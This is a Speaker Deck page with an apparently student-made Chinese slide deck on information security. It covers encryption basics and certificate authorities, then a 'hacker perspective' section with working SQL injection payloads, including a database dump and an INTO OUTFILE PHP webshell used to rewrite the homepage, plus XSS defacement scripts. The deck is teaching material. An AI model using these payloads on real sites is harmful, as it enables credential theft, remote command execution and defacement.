Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Information Security
Search
Bleu (Jia-Huei Ren)
February 24, 2014
Technology
0
47
Information Security
AIS presentation
[email protected]
Bleu (Jia-Huei Ren)
February 24, 2014
Tweet
Share
More Decks by Bleu (Jia-Huei Ren)
See All by Bleu (Jia-Huei Ren)
Introduction to Convolutional Neural Networks
divjose
0
83
Recently doing-20161110
divjose
0
43
Industry 5.0
divjose
0
230
Big Data
divjose
0
66
Database Management Concepts
divjose
0
59
Bleu Framework for Hbase & Hadoop
divjose
0
56
Paper discuss : Hadoop & HBase
divjose
1
57
Visualizing social network concepts
divjose
0
71
Determinants of RFID adoption intention: Evidence from Taiwanese retail chains
divjose
0
59
Other Decks in Technology
See All in Technology
バッチ処理のSLOをどう設計するか
rynsuke
7
590
検証からプロダクトへ: シームレスなLLM開発の ためのしくみ作り
nunukim
1
210
オーティファイ会社紹介資料 / Autify Company Deck
autifyhq
7
100k
実務への応用例から考える 変更に強いオブジェクト指向設計 / 20240324-ooc2024
bengo4com
9
5.6k
中学生でもわかる深層学習
e869120
12
3.8k
中央集権体制からDataOpsへの転換 / centralized-to-dataops-transformation
pei0804
7
1.6k
「XX試験の環境作ってよ」と言われた時によく使うAWSのソリューションについて
bun913
0
120
Terraform v1.7のTest mocking機能の紹介 / Introducing the Test mocking feature of Terraform v1.7
yayoi_dd
1
100
.NETの非同期戦略とUnityとの相互運用
neuecc
2
2.4k
戦略的DDDを実践するための跳躍力 / OOC 2024
pictiny
6
4.2k
VSCode上からSlackにメッセージを送る拡張機能を作っている話
ebarakazuhiro
0
120
ビジネスロジックを「型」で表現するOOPのための関数型DDD / Functional And Type-Safe DDD for OOP
yuitosato
29
12k
Featured
See All Featured
A better future with KSS
kneath
230
16k
For a Future-Friendly Web
brad_frost
170
8.9k
Robots, Beer and Maslow
schacon
PRO
154
7.9k
Embracing the Ebb and Flow
colly
78
4.1k
JazzCon 2018 Closing Keynote - Leadership for the Reluctant Leader
reverentgeek
178
11k
Large-scale JavaScript Application Architecture
addyosmani
501
110k
VelocityConf: Rendering Performance Case Studies
addyosmani
319
23k
Build The Right Thing And Hit Your Dates
maggiecrowley
23
1.9k
Being A Developer After 40
akosma
56
580k
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
eileencodes
1
1.2k
Bootstrapping a Software Product
garrettdimon
PRO
302
110k
The Language of Interfaces
destraynor
150
23k
Transcript
會計資訊系統簡報 - 資訊安全 簡報製作 : 四資管四甲 任家輝 指導教授 : 杜佩樺
隱密性 如何確保只有寄件者及收件者可以 讀取資料
可認證性 如何知道資料是來自原寄件者
完整性 如何知道資料沒有被更改過
不可抵賴性 防止資料傳輸/接收發生後對行為 的否認。
秘密金鑰加密法(對稱性加密)
公開金鑰加密法(非對稱性加密) • 收件者保留私密金鑰,並將公開金鑰公諸 於世,送件者依照公開金鑰將訊息加密, 收件者在使用私密金鑰進行解密
公開金鑰加密法(非對稱性加密)
可逆加密與不可逆加密
安全認證中心CA
延伸內容 – 從駭客面談資安 了解駭客思維,才能應付千方百計 的駭客
CSRF
None
SQLi
None
查詢注入欄位 • 注入時,可能會先使用 UNION 找出可以插 入的地方爲何,例如: • http://localhost/news/?mod=news&act =show&id=-1 union
select 1,2,3,4,5,6,7
• 可以看出 3, 4, 7 的地方可以插入我們想要獲取的資 料, 假如我們想要知道當前使用者為何,可以將 7 的地
方改成 user() 如: • http://localhost/news/?mod=news&act=show& id=-1 union select 1,2,3,4,5,6,user()
None
• 若是要取得某欄位的資訊的話(以使 用者密碼為例),則是注入-1 union select 1,2,3,4,5,6,password from user limit 0,1
• 使用(SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE
@ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema,table_name,column_name) )) ) )x)將整個資料庫dump出來
寫後門改首頁 • ?MOD=NEWS&ACT=SHOW&ID=1 INTO OUTFILE '../../../../apache24/htdoc s/.a.php' LINES TERMINATED BY
'<?php eval($_GET[cmd];)?>' • 透過outfile的方式建立後門檔案到網站目 錄中
再透過fwrite的方式更改首頁。 • /.a.php?cmd=$fp = fopen('index.php', 'w');fwrite($fp, "Hack by 49941131");fclose($fp);
None
或是直接以最高權限執行 server command
XSS
使用訊息框進行XSS attack • <script>alert(‘hello’)</script>
利用XSS改首頁 <script>window.onload = function(){document.write('hacked by 49941131')}</script>
謝謝